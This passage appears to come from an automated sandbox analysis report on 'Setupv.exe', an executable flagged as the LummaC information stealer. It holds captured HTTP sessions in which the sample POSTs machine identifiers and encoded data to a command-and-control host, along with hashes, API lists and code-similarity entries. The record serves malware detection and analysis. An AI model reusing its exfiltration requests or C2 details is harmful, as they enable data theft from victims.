db 0c 2d fa 80 f8 a1 64 99 52 e4 a6 9d 85 25 f1
                                                                                                                                                                                                                          Data Ascii: ;`s*'\Ygl)d1*:=eIIt`dGWs0~#d>4M)f#MsITKNuRV{IAdLAylE}0shE(8[slY;0KJR8GTpn)WuyO{ALa-dR%
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC100INData Raw: ff 10 1a 80 a9 77 6b 96 de 24 2b c6 cf 33 df c4 d7 37 a2 96 59 81 e7 bd bc 38 8f c1 49 c2 ad fd 9b 52 65 d6 bb 2d 12 95 af c3 6e 63 24 0d 18 f6 00 8f dd ac d8 3e 44 14 96 94 68 ae f5 85 24 17 67 9f da ee 1e f9 0c 9a 8c 92 52 12 c9 2b d2 e5 5f 4d 90 f3 5f aa 39 09 81 42 d6 2e b3 d4 7c 8c 3e ab 53 de
                                                                                                                                                                                                                          Data Ascii: wk$+37Y8IRe-nc$>Dh$gR+_M_9B.|>S
2025-04-28 17:34:53 UTC    281    OUT    POST /qena HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=n2O6r5Alv1GWjGKnMf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 14929
Host: toptalentw.top
2025-04-28 17:34:54 UTC    289    IN    HTTP/1.1 200 OK
Date: Mon, 28 Apr 2025 17:34:54 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 9378501ffed047fd-DFW
alt-svc: h3=":443"; ma=86400
Content-Length: 70


Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
3             192.168.2.5    49700          104.21.36.133     443                 7840    C:\Users\user\Desktop\Setupv.exe
Timestamp    Bytes transferred    Direction    Data
2025-04-28 17:34:55 UTC    280    OUT    POST /qena HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=MjYU1bfK4GdCYGj81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 15073
Host: toptalentw.top
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: 2d 2d 4d 6a 59 55 31 62 66 4b 34 47 64 43 59 47 6a 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 0d 0a 2d 2d 4d 6a 59 55 31 62 66 4b 34 47 64 43 59 47 6a 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 6a 59 55 31 62 66 4b 34 47 64 43 59 47 6a 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: --MjYU1bfK4GdCYGj81Content-Disposition: form-data; name="uid"9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c--MjYU1bfK4GdCYGj81Content-Disposition: form-data; name="pid"2--MjYU1bfK4GdCYGj81Content-Disposition: form-data; name="hwid"
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: 42 fd 2a d1 56 91 9e b2 63 8f a3 ec e7 d8 c5 5f 8d 5d 63 dd e0 6f 9c b7 6a c3 86 d4 68 6a 6a d1 88 9b 1e 52 a4 27 ef f7 79 17 16 66 17 ca 8a 91 22 07 1b fb 92 ab 2a b1 81 3e 94 5a 77 d2 6d 82 49 80 f5 b2 7a a1 48 ee 88 60 52 cd 13 d6 86 a4 23 e0 f7 01 60 28 3f 1c 30 39 4d ef ea 4d 79 9d 92 22 79 20 36 40 99 97 cb 8a c6 96 5b ea 8f 1b 8b 51 a1 cd 84 88 9f 3f 05 2f bb 55 2e c6 90 15 48 bd c0 56 4a 3e 7f 89 38 bd a7 f2 7b 91 3d 7c 1b 4b 74 41 91 25 58 bd ea c2 0c be 4d 39 b4 59 07 67 6d 9f 1d 73 da 93 0f 73 ad 05 70 e5 5c d2 d4 d1 0c c2 4a 20 30 fa d3 a2 31 9d c5 56 23 53 1d c9 96 3a bc 30 b8 6b 9f 34 34 87 33 4c 2d 7f 09 81 be 46 3a 9f 4b 90 1e d3 70 0b e3 d7 cc 90 e8 7b b1 69 35 6e ab 89 9f a3 5b 44 a2 41 a0 de 17 a6 59 ad d9 20 e4 ec 29 3c 77 b8 2d e0 6e
                                                                                                                                                                                                                          Data Ascii: B*Vc_]cojhjjR'yf"*>ZwmIzH`R#`(?09MMy"y 6@[Q?/U.HVJ>8{=|KtA%XM9Ygmssp\J 01V#S:0k443L-F:Kp{i5n[DAY )<w-n
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: af 02 af be f1 14 73 fc f9 aa d3 ef cb 03 66 c8 2e ab 2a b1 c7 e4 06 67 47 c0 8a f8 20 f8 11 62 7c c5 fa 2d cc 31 61 0f 24 13 16 47 7d b4 93 ba 96 5e 5c fb e1 b5 9a b7 65 1c eb 3b dd b8 c2 1d f0 d1 6e 03 14 20 90 d6 fe 7b 45 c2 e2 15 17 d2 29 43 8b d3 ca 3c 88 c8 ef 8d 3f 34 f5 67 cf 6b a7 2c d9 86 7f 18 e8 48 b4 ee 48 a9 6f 17 ee 12 3e a7 a9 b5 fd aa 6f 52 99 8c fe f7 05 fa cf 4f 32 96 1f 49 7c 81 f5 8a 0d d1 1f 5c 27 3d 19 b3 26 e0 08 70 0a 1c b8 38 13 db 2c 7d 47 1c 04 3a ad b8 80 67 f9 9a 78 9a 88 2c cc 15 f7 45 db 10 3e 4e bd b5 b1 90 fa 67 32 ca c0 2e d1 bc 86 52 f1 70 d7 ef e2 93 5d 0d 0d c0 2a 1e bb c3 23 f8 0d 6c 02 09 3a 21 ce 50 2b b5 13 c8 a9 ff 6e 1b 74 8c 1e ae a4 e2 55 64 a8 6b 6f 87 18 b8 8d dc 02 6b 04 67 76 16 bf 68 af b3 8c f6 13 94 76
                                                                                                                                                                                                                          Data Ascii: sf.*gG b|-1a$G}^\e;n {E)C<?4gk,HHo>oRO2I|\'=&p8,}G:gx,E>Ng2.Rp]*#l:!P+ntUdkokgvhv
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: 5e 47 c7 cd d2 97 ca c1 79 3d ed 67 ff 00 a4 04 90 a6 af 47 51 23 ea 85 7f af 15 b8 62 87 f7 8b 45 a7 18 9b 83 76 e4 3a 5c 5d 48 fb 79 ec c7 cb f9 48 bc 3e 9d ad 19 c9 88 de ca 3b ab 29 13 9c 7c e9 df c9 f8 29 9c 88 2e 24 84 57 84 46 52 43 08 ba dc 86 87 bf da f0 ab a1 da 7e bc cc 42 e5 8c a1 d5 17 57 50 f5 8e 4d eb 7e 44 ac 9e 62 47 0c 84 f8 96 0c 72 3a f9 68 8e 4a 1d c0 69 63 0f 88 2b 3a ca 46 66 d4 45 db 22 41 26 b3 9d 05 6b 91 61 8b ae d3 20 e0 39 75 bd 0a b7 35 4a fe fe 4e 6f fa 83 50 ce 18 2d fa 63 9c 23 b7 9b da 08 ce 6c 3b e3 8f 6c b8 19 9c c4 81 c9 6f ac 9b 0b a5 65 b9 db 0e 02 09 c0 da 6a f4 52 73 44 38 9a d6 52 b6 8f 3f 2e c0 61 01 d3 01 c0 40 85 52 af f4 e0 e6 b0 0f c9 65 0c 5e 69 ba 13 18 63 b4 03 57 3d d7 d4 6a f4 a6 8c 2a ee b1 9d a0 87 ec
                                                                                                                                                                                                                          Data Ascii: ^Gy=gGQ#bEv:\]HyH>;)|).$WFRC~BWPM~DbGr:hJic+:FfE"A&ka 9u5JNoP-c#l;loejRsD8R?.a@Re^icW=j*
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: 1a ad 70 5b d0 18 cf 19 54 3d bc 20 65 9f 14 c3 65 93 17 49 a8 3f a9 14 bf 94 cc ac 52 91 9c 40 5f 36 bf 28 6e fd 1a 86 5f 32 4f df 58 e1 32 f0 ea 46 ad 7a cb ec 77 40 97 db b5 ad e5 4d 61 12 89 76 aa 3a a0 63 de 1e 23 09 c8 0a 54 d1 46 90 a9 e8 7b dd 1b 54 f2 9d 53 63 d6 f7 c0 2a 13 b0 22 d0 5f 7d e2 07 45 35 fa 15 6d 5a f9 25 10 c0 dc f6 35 5c af 40 16 9f 03 72 b3 ec cc 49 d9 67 32 d8 05 be 54 ad 57 4c 76 f1 62 15 a6 b0 06 06 ab 87 c7 73 88 4d 73 ba c6 87 7f 12 b3 3f 6d 67 4b 04 b0 a3 a4 4e 7c 72 dc 55 9d 36 3b 18 c4 9d 92 78 fc ab 8a 42 eb dd 66 75 50 93 fb 8b 59 29 0a e8 08 e2 2a 3c b6 0f fb 1f 34 e8 ce e4 6f 8c fa 38 10 ab a2 d4 63 3b f5 fb c3 c7 8a d1 4e 3a 01 a2 ab 08 be 99 4f 62 6d 96 a1 93 73 de 70 d3 fd ad ba 84 2a ab cd 97 10 b4 5b b4 14 5b ae
                                                                                                                                                                                                                          Data Ascii: p[T= eeI?R@_6(n_2OX2Fzw@Mav:c#TF{TSc*"_}E5mZ%5\@rIg2TWLvbsMs?mgKN|rU6;xBfuPY)*<4o8c;N:Obmsp*[[
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: d1 70 d3 d1 e3 e5 c8 5c 37 dd 5a bb 5d 5f a7 77 3a cd 6c 88 98 68 db d5 dd ce ee a4 ec d1 d9 98 e2 40 d3 2d 81 ce 4a 48 09 ee 39 39 24 a4 b1 0a 0a 48 50 66 1b 5a f9 bc eb aa 5f 6e b4 5d 47 af 66 34 14 58 ff a6 98 b5 40 b6 61 21 64 e0 6a d1 96 84 46 73 53 49 5c 23 d4 bf 84 a6 a9 5f ca af 27 fb fc ab 8f 48 0e 35 04 5b 24 11 4a 48 d1 7c a7 5b 49 51 78 99 4b 70 73 5e 8a 33 a9 1d 1e 1d b2 be 73 08 15 87 2e fa c6 2d b4 5c 4f 8d 0c 8e 5f d4 10 01 f5 61 9e 2c b0 a4 ee ad 48 e6 88 5b 59 21 9e b2 42 a8 4f ae af d8 61 21 89 10 20 56 c1 19 e8 db 6f c2 be 09 a1 85 8b 83 6f 36 93 7c 31 39 95 27 9f 33 c9 d4 a4 0a 22 49 df f2 02 d4 14 b9 2b b6 cc 9f d7 80 ac b4 55 4d fe 99 78 26 be 25 ce ff 82 4d 3e 69 7c 8d 14 5f 6c ec 51 93 fa 7f dd a7 43 6f 7c df a5 06 50 af f9 75 5e
                                                                                                                                                                                                                          Data Ascii: p\7Z]_w:lh@-JH99$HPfZ_n]Gf4X@a!djFsSI\#_'H5[$JH|[IQxKps^3s.-\O_a,H[Y!BOa! Voo6|19'3"I+UMx&%M>i|_lQCo|Pu^
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: c9 88 e3 0e 83 d9 ec 90 b1 07 e0 30 c6 92 fa 4f 52 6c 8f 83 9f 7d a2 d4 ce 90 f0 72 8b ea e9 ea 3f a1 3e 44 bc 43 0b 39 28 d3 0f e5 b2 54 cc 00 a6 25 cd 16 0b 40 13 99 60 06 ac 46 5e 04 03 ef 7c 57 be 05 39 66 34 65 c1 a5 c2 b8 55 af e2 0e 32 19 64 53 cc 53 81 db 16 ec 06 0f 86 ec f4 de 69 22 b5 89 9d 44 00 5a c5 e3 35 00 a9 de 77 52 7a 82 40 69 54 ab 0a 80 3b a0 f1 59 12 46 fe 73 8a 2b a7 b3 d7 23 bd 69 1f cc 61 c6 74 da b9 89 54 8a e2 d2 2c 56 0d 7a 7a 0a 95 1d 2a 4b 2c ba 77 85 14 ee c1 02 72 fd ac cf 63 5d cc ce e1 39 5f c0 b8 df ee 56 45 60 8d a4 ab 45 a4 fb e6 fc 2f 41 d3 90 bd 32 9d d2 b7 2a 19 0e 53 47 6b 1b bb 9b 89 14 07 10 ca 05 7a 7d 98 a6 3b 25 47 8a 7d 41 2c 13 59 57 84 fd 04 9a 97 6f 5a c7 d9 66 41 11 61 b3 6e 99 94 48 f9 fb 56 90 f1 56 27
                                                                                                                                                                                                                          Data Ascii: 0ORl}r?>DC9(T%@`F^|W9f4eU2dSSi"DZ5wRz@iT;YFs+#iatT,Vzz*K,wrc]9_VE`E/A2*SGkz};%G}A,YWoZfAanHVV'
2025-04-28 17:34:55 UTC | 289 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Apr 2025 17:34:55 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 9378502bdccd477c-DFW
alt-svc: h3=":443"; ma=86400
Content-Length: 70


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.5 | 49701       | 104.21.36.133  | 443              | 7840 | C:\Users\user\Desktop\Setupv.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-28 17:34:56 UTC | 280 | OUT | POST /qena HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=7tfr7jpx9ESjC6xCI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 20562
Host: toptalentw.top
2025-04-28 17:34:56 UTC | 1460 | OUT | Data Raw: 2d 2d 37 74 66 72 37 6a 70 78 39 45 53 6a 43 36 78 43 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 0d 0a 2d 2d 37 74 66 72 37 6a 70 78 39 45 53 6a 43 36 78 43 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 74 66 72 37 6a 70 78 39 45 53 6a 43 36 78 43 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
Data Ascii: --7tfr7jpx9ESjC6xCIContent-Disposition: form-data; name="uid"9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c--7tfr7jpx9ESjC6xCIContent-Disposition: form-data; name="pid"3--7tfr7jpx9ESjC6xCIContent-Disposition: form-data; name="hwid"
2025-04-28 17:34:57 UTC | 289 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Apr 2025 17:34:57 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 937850346a764665-DFW
alt-svc: h3=":443"; ma=86400
Content-Length: 70


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.5 | 49702       | 104.21.36.133  | 443              | 7840 | C:\Users\user\Desktop\Setupv.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-28 17:34:59 UTC | 281 | OUT | POST /qena HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=M09Efv1f20zz1AhfYCv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 2401
Host: toptalentw.top
2025-04-28 17:34:59 UTC | 1460 | OUT | Data Raw: 2d 2d 4d 30 39 45 66 76 31 66 32 30 7a 7a 31 41 68 66 59 43 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 0d 0a 2d 2d 4d 30 39 45 66 76 31 66 32 30 7a 7a 31 41 68 66 59 43 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 30 39 45 66 76 31 66 32 30 7a 7a 31 41 68 66 59 43 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69
Data Ascii: --M09Efv1f20zz1AhfYCvContent-Disposition: form-data; name="uid"9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c--M09Efv1f20zz1AhfYCvContent-Disposition: form-data; name="pid"1--M09Efv1f20zz1AhfYCvContent-Disposition: form-data; name="hwi
2025-04-28 17:34:59 UTC | 289 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Apr 2025 17:34:59 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 93785044cb5d4662-DFW
alt-svc: h3=":443"; ma=86400
Content-Length: 70
2025-04-28 17:34:59 UTC | 70 | IN | Data Raw: 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d
Data Ascii: {"success":{"message":"message success delivery from 173.244.56.186"}}


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49703 | Destination IP: 104.21.36.133 | Destination Port: 443 | PID: 7840 | Process: C:\Users\user\Desktop\Setupv.exe
Timestamp: 2025-04-28 17:35:01 UTC | Bytes transferred: 277 | Direction: OUT
POST /qena HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=2I9UW0E70hbAb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 590349
Host: toptalentw.top
Timestamp: 2025-04-28 17:35:01 UTC | Bytes transferred: 1460 | Direction: OUT
Data Raw: 2d 2d 32 49 39 55 57 30 45 37 30 68 62 41 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 0d 0a 2d 2d 32 49 39 55 57 30 45 37 30 68 62 41 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 49 39 55 57 30 45 37 30 68 62 41 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 30 44 37 34 42 30 33 41 43 30
Data Ascii: --2I9UW0E70hbAbContent-Disposition: form-data; name="uid"9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c--2I9UW0E70hbAbContent-Disposition: form-data; name="pid"1--2I9UW0E70hbAbContent-Disposition: form-data; name="hwid"E20D74B03AC0
Timestamp: 2025-04-28 17:35:03 UTC | Bytes transferred: 289 | Direction: IN
HTTP/1.1 200 OK
Date: Mon, 28 Apr 2025 17:35:03 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 93785051d84a463b-DFW
alt-svc: h3=":443"; ma=86400
Content-Length: 70


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 104.21.36.133 | Destination Port: 443 | PID: 7840 | Process: C:\Users\user\Desktop\Setupv.exe
Timestamp: 2025-04-28 17:35:04 UTC | Bytes transferred: 263 | Direction: OUT
POST /qena HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 95
Host: toptalentw.top
Timestamp: 2025-04-28 17:35:04 UTC | Bytes transferred: 95 | Direction: OUT
Data Raw: 75 69 64 3d 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 26 63 69 64 3d 26 68 77 69 64 3d 45 32 30 44 37 34 42 30 33 41 43 30 46 43 32 42 30 39 30 41 30 44 39 38 44 44 30 30 37 32 35 43
Data Ascii: uid=9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c&cid=&hwid=E20D74B03AC0FC2B090A0D98DD00725C
Timestamp: 2025-04-28 17:35:04 UTC | Bytes transferred: 246 | Direction: IN
HTTP/1.1 200 OK
Date: Mon, 28 Apr 2025 17:35:04 GMT
Content-Type: application/octet-stream
Content-Length: 43
Connection: keep-alive
Server: cloudflare
Cf-Cache-Status: DYNAMIC
CF-RAY: 93785063eeab4689-DFW
alt-svc: h3=":443"; ma=86400
Timestamp: 2025-04-28 17:35:04 UTC | Bytes transferred: 43 | Direction: IN
Data Raw: 65 ea be 9d 74 23 0a 17 e8 17 30 b4 1a ae fb 6c 39 b3 e2 82 15 5d 69 e1 80 25 dc 2c 2a dc df f7 db 82 6e 89 20 48 5e db c2 02 b1
Data Ascii: et#0l9]i%,*n H^


[Chart: process activity timeline, x axis 0-40 s, y axis 0-100]
[Chart: process memory timeline, x axis 0-40 s, y axis 0-30 MB]
[Chart: process behavior distribution; legend: File, Registry]

Target ID: 0
Start time: 13:34:14
Start date: 28/04/2025
Path: C:\Users\user\Desktop\Setupv.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Setupv.exe"
Imagebase: 0x400000
File size: 5'298'048 bytes
MD5 hash: A88651093C94D9006DA8CCBC80535E29
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Execution Graph

Execution Coverage: 16.7%
Dynamic/Decrypted Code Coverage: 98.9%
Signature Coverage: 55.3%
Total number of Nodes: 94
Total number of Limit Nodes: 4
[Execution graph: textual node/edge dump of the 94-node graph for the memory region at 02730000, with entry nodes at 2730000, 2730509, 2730e58 and 2731118. API calls appearing on graph nodes: GetPEB, CreateThread, TerminateProcess, CreateToolhelp32Snapshot, Thread32First, Wow64SuspendThread, CloseHandle, NtAllocateVirtualMemory, NtProtectVirtualMemory, NtFreeVirtualMemory.]

Executed Functions

Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: !@$,$E$F$F$F$G$G$G$H$H$H$H$I$I$I$I$K$K$a+<Z
• API String ID: 0-1468048446
• Opcode ID: c19805f07ddf6a16674ac02d184dcb877c2735e7894112116302a322f8dd43d1
• Instruction ID: 7c54e283cbfc14ba32c61038a88231efefff9bf4ab4391304356899ae70047c7
• Opcode Fuzzy Hash: c19805f07ddf6a16674ac02d184dcb877c2735e7894112116302a322f8dd43d1
• Instruction Fuzzy Hash: DF32F17164C3908BD325CB38C4583AFBBE1ABC5314F499A2DE4DA87382D7B98845CB57
APIs
• CoCreateInstance.COMBASE(?,00000000,00000001,?,00000000), ref: 02E51262
• SysAllocString.OLEAUT32(A3EDA112), ref: 02E512FB
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02E5133C
• SysAllocString.OLEAUT32(6BBB69C7), ref: 02E513F2
• SysAllocString.OLEAUT32(83478153), ref: 02E514DC
• VariantInit.OLEAUT32(?), ref: 02E5155C
• VariantClear.OLEAUT32(?), ref: 02E51849
Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: AllocString$Variant$BlanketClearCreateInitInstanceProxy
• String ID: <Fhc$^l/C$nl/C$xurs
• API String ID: 305737880-2558134549
• Opcode ID: 924bf221f7d489498083d621763cdbe2b7d3d603a612de6f71d87ec4cc0abc55
• Instruction ID: 709c8b9fe4ac97dc4fca55b574986356721ae8e7107271fe466cc57749178a03
• Opcode Fuzzy Hash: 924bf221f7d489498083d621763cdbe2b7d3d603a612de6f71d87ec4cc0abc55
• Instruction Fuzzy Hash: 2F720376A583518BD324CF29C88175BBBE2EFC9314F148A2DE998CB391D774D805CB92
Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: InitializeThunk
• String ID: GFIH$GFIH$GFIH$GFIH$R}&$V}&$a+<Z$a+<Z$a+<Z$a+<Z$~+n%$qw$u{
• API String ID: 2994545307-1495026326
• Opcode ID: 1981083c2d60287bb9179f441deaf03ffd5240bc59426d198f1b9b4576744ffb
• Instruction ID: f1604e5b4db3b005be4600374a7c23d6e017c5432f2e32f7603caeab2b122d4a
• Opcode Fuzzy Hash: 1981083c2d60287bb9179f441deaf03ffd5240bc59426d198f1b9b4576744ffb
• Instruction Fuzzy Hash: FEB213716983A08BE324CF29C85176BB7E2FFC5318F18E92CE5D697281D7759809CB42
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID: Uninitialize
• String ID: ^$c3$ga$~q
• API String ID: 3861434553-3691076684
• Opcode ID: 23338515eef4d37744e9dac22441ce8179baa8f7d62a20284582e2d5a4287d80
• Instruction ID: 4675773b407be8aeefc6d40e1473cb94d7581f15f56e8f673671cfd7ef55dca6
• Opcode Fuzzy Hash: 23338515eef4d37744e9dac22441ce8179baa8f7d62a20284582e2d5a4287d80
• Instruction Fuzzy Hash: 8C1203B594D3A08FD335CF2584607ABBFE1AFC7704F089A6DD8DA4B241CB3549098B92
Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: "$%$>$I$K$~
• API String ID: 0-1658047442
• Opcode ID: 3e22bb7bcd8e9aa47fe98b8d9dfbc2a520c1bea7a41a61f4007f66ae204ea096
• Instruction ID: 84e008a32ea1feefbeb0a3a6e568c0d6053bd1a8bb9649cc873f9d76f1ffa0b7
• Opcode Fuzzy Hash: 3e22bb7bcd8e9aa47fe98b8d9dfbc2a520c1bea7a41a61f4007f66ae204ea096
• Instruction Fuzzy Hash: 3A026E7194C7908FC328DF38C5913AEBBE1AF95314F45992EE8DAC7391DA788845CB42
Strings
Memory Dump Source
• Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
Similarity
• API ID:
• String ID: 5$E$Z
• API String ID: 0-2360667877
• Opcode ID: 1e92b9a4d51e715f02dfb213b6aa7335232b28630e84769a0df4d05c0d73a66e
